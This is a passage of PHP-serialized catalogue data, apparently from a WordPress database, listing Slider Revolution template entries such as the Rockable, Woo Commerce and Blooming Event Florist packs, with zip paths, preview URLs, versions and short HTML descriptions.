Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:398;a:25:{s:2:\"id\";s:3:\"434\";s:5:\"title\";s:15:\"Rockable Lineup\";s:5:\"alias\";s:15:\"rockable-lineup\";s:3:\"zip\";s:25:\"packs/rockable-lineup.zip\";s:3:\"uid\";s:32:\"6631980112805533a0d328c37e56adbd\";s:3:\"img\";s:26:\"rockable-lineup/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:399;a:25:{s:2:\"id\";s:3:\"435\";s:5:\"title\";s:17:\"Rockable Lineup 2\";s:5:\"alias\";s:17:\"rockable-lineup-2\";s:3:\"zip\";s:27:\"packs/rockable-lineup-2.zip\";s:3:\"uid\";s:32:\"98bc41d982dc478edabff4aa99461dbc\";s:3:\"img\";s:28:\"rockable-lineup-2/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:400;a:25:{s:2:\"id\";s:3:\"436\";s:5:\"title\";s:22:\"Rockable Gallery Title\";s:5:\"alias\";s:22:\"rockable-gallery-title\";s:3:\"zip\";s:32:\"packs/rockable-gallery-title.zip\";s:3:\"uid\";s:32:\"da43a76f5bc77aa6efe158b00ab7cf0d\";s:3:\"img\";s:33:\"rockable-gallery-title/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:401;a:25:{s:2:\"id\";s:3:\"437\";s:5:\"title\";s:16:\"Rockable Gallery\";s:5:\"alias\";s:16:\"rockable-gallery\";s:3:\"zip\";s:26:\"packs/rockable-gallery.zip\";s:3:\"uid\";s:32:\"c12a144d6860bcf24e91d5b980ac22f1\";s:3:\"img\";s:27:\"rockable-gallery/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:402;a:25:{s:2:\"id\";s:3:\"438\";s:5:\"title\";s:17:\"Rockable Sponsors\";s:5:\"alias\";s:17:\"rockable-sponsors\";s:3:\"zip\";s:27:\"packs/rockable-sponsors.zip\";s:3:\"uid\";s:32:\"1e40d4a810c23f8d5fe5cd5ca31ee20d\";s:3:\"img\";s:28:\"rockable-sponsors/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:403;a:25:{s:2:\"id\";s:3:\"439\";s:5:\"title\";s:15:\"Rockable Footer\";s:5:\"alias\";s:15:\"rockable-footer\";s:3:\"zip\";s:25:\"packs/rockable-footer.zip\";s:3:\"uid\";s:32:\"a4a9952d5e56fc14366155e8ebfa432a\";s:3:\"img\";s:26:\"rockable-footer/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:404;a:25:{s:2:\"id\";s:3:\"440\";s:5:\"title\";s:21:\"Rockable Detail Modal\";s:5:\"alias\";s:21:\"rockable-detail-modal\";s:3:\"zip\";s:31:\"packs/rockable-detail-modal.zip\";s:3:\"uid\";s:32:\"b51d918203ff7975a144a9f1be09f31b\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:405;a:25:{s:2:\"id\";s:3:\"441\";s:5:\"title\";s:23:\"Rockable Detail Modal 2\";s:5:\"alias\";s:23:\"rockable-detail-modal-2\";s:3:\"zip\";s:33:\"packs/rockable-detail-modal-2.zip\";s:3:\"uid\";s:32:\"dcf51ebb3d4a1dec94748a1e016c5ef7\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:406;a:22:{s:2:\"id\";s:3:\"442\";s:5:\"title\";s:27:\"Real Estate Showcase Slider\";s:5:\"alias\";s:27:\"real-estate-showcase-slider\";s:3:\"zip\";s:31:\"Real-Estate-Showcase-Slider.zip\";s:3:\"uid\";s:32:\"486b2bbe296722e70421731e3c05711b\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/real-estate-showcase-slider/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:152:\"<span class=\"ttm_content\">An elegant showcase for your real estate & realtor website. Flexible and customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:407;a:22:{s:2:\"id\";s:3:\"443\";s:5:\"title\";s:16:\"Isometric Slider\";s:5:\"alias\";s:16:\"isometric-slider\";s:3:\"zip\";s:20:\"isometric-slider.zip\";s:3:\"uid\";s:32:\"fb06051fcf6649a44f2292044e414a36\";s:3:\"img\";s:27:\"isometric-slider/slide1.jpg\";s:7:\"preview\";s:51:\"https://revolution.themepunch.com/isometric-slider/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:154:\"<span class=\"ttm_content\">A colorful, isometric slider template with fully customizable colors and screen content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:408;a:25:{s:2:\"id\";s:3:\"444\";s:5:\"title\";s:26:\"Woo Commerce Slider Static\";s:5:\"alias\";s:26:\"woo-commerce-slider-static\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"woo-commerce-slider-static\";s:3:\"img\";s:39:\"packages/woo-commerce-slider-static.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:178:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Woo Commerce Slider Static\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"35\";s:9:\"installed\";b:0;}i:409;a:25:{s:2:\"id\";s:3:\"445\";s:5:\"title\";s:17:\"E-Commerce Slider\";s:5:\"alias\";s:17:\"E-Commerce-Slider\";s:3:\"zip\";s:27:\"packs/E-Commerce-Slider.zip\";s:3:\"uid\";s:32:\"1533cfd83c2ae122f23074e1ed77f256\";s:3:\"img\";s:28:\"E-Commerce-Slider/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:178:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Woo Commerce Slider Static\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"35\";s:9:\"installed\";b:0;}i:410;a:25:{s:2:\"id\";s:3:\"446\";s:5:\"title\";s:23:\"E-Commerce Slider Modal\";s:5:\"alias\";s:23:\"E-Commerce-Slider-Modal\";s:3:\"zip\";s:33:\"packs/E-Commerce-Slider-Modal.zip\";s:3:\"uid\";s:32:\"825e05c3967515b92a75da017c68a863\";s:3:\"img\";s:34:\"E-Commerce-Slider-Modal/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:178:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Woo Commerce Slider Static\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"35\";s:9:\"installed\";b:0;}i:411;a:22:{s:2:\"id\";s:3:\"447\";s:5:\"title\";s:27:\"Woo Commerce Slider Dynamic\";s:5:\"alias\";s:27:\"Woo-Commerce-Slider-Dynamic\";s:3:\"zip\";s:31:\"Woo-Commerce-Slider-Dynamic.zip\";s:3:\"uid\";s:32:\"b8e2c64f3739e552c563c48c59f20fe7\";s:3:\"img\";s:38:\"Woo-Commerce-Slider-Dynamic/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the dynamic version that uses Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:412;a:25:{s:2:\"id\";s:3:\"448\";s:5:\"title\";s:31:\"Blooming Event Florist Template\";s:5:\"alias\";s:31:\"blooming-event-florist-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:39:\"blooming-event-florist-template-package\";s:3:\"img\";s:52:\"packages/blooming-event-florist-template-package.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:413;a:25:{s:2:\"id\";s:3:\"449\";s:5:\"title\";s:15:\"Blooming Header\";s:5:\"alias\";s:15:\"blooming-header\";s:3:\"zip\";s:25:\"packs/blooming-header.zip\";s:3:\"uid\";s:32:\"aa2ee34fd8ed018945ba64e6913810e4\";s:3:\"img\";s:26:\"blooming-header/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:414;a:25:{s:2:\"id\";s:3:\"450\";s:5:\"title\";s:14:\"Blooming About\";s:5:\"alias\";s:14:\"blooming-about\";s:3:\"zip\";s:24:\"packs/blooming-about.zip\";s:3:\"uid\";s:32:\"dd7095e46fab2eb475d00480fd17a6ec\";s:3:\"img\";s:25:\"blooming-about/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:415;a:25:{s:2:\"id\";s:3:\"451\";s:5:\"title\";s:18:\"Blooming Portfolio\";s:5:\"alias\";s:18:\"blooming-portfolio\";s:3:\"zip\";s:28:\"packs/blooming-portfolio.zip\";s:3:\"uid\";s:32:\"c72ddcbb07b62982b8c21328a6383e22\";s:3:\"img\";s:29:\"blooming-portfolio/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:416;a:25:{s:2:\"id\";s:3:\"452\";s:5:\"title\";s:22:\"Blooming Wedding Title\";s:5:\"alias\";s:22:\"blooming-wedding-title\";s:3:\"zip\";s:32:\"packs/blooming-wedding-title.zip\";s:3:\"uid\";s:32:\"4fcfb0b99289c12d014c67306bb7687b\";s:3:\"img\";s:33:\"blooming-wedding-title/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:417;a:25:{s:2:\"id\";s:3:\"453\";s:5:\"title\";s:25:\"Blooming Wedding Carousel\";s:5:\"alias\";s:25:\"blooming-wedding-carousel\";s:3:\"zip\";s:35:\"packs/blooming-wedding-carousel.zip\";s:3:\"uid\";s:32:\"1d1bb979dbfca8ba9d43da1c0f665339\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:418;a:25:{s:2:\"id\";s:3:\"454\";s:5:\"title\";s:21:\"Blooming Wedding 